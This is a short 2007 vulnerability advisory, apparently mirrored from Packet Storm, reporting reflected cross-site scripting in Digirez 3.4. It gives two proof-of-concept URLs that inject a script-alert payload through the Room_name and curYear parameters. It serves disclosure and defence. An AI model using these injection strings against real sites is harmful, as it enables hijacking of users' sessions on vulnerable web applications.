digirez-xss.txt

🗓️ 31 May 2007 00:00:00Reported by Linux_DroxType

packetstorm🔗 packetstormsecurity.com👁 19 Views

Vulnerability in Digirez 3.4 allows XSS attack via room info_book and week pages

`Hello   
Vulnerable : Digirez   
Version: 3.4  
web : http://www.digiappz.com  
  
  
XSS :  
1-  
http://www.example.com/room/info_book.asp?Room_name=[XSS]  
2-  
http://www.example.com/room/week.asp?curYear=[XSS]  
  
For Example u can put :  
1-  
http://www.example.com/room/info_book.asp?Room_name='><script>alert(1);</script>  
2-  
http://www.example.com/room/week.asp?curYear='><script>alert(1);</script>  
  
Discovered By Linux_Drox  
www.LeZr.Com  
  
Best regards ,,  
`

31 May 2007 00:00Current

7.4High risk

Vulners AI Score7.4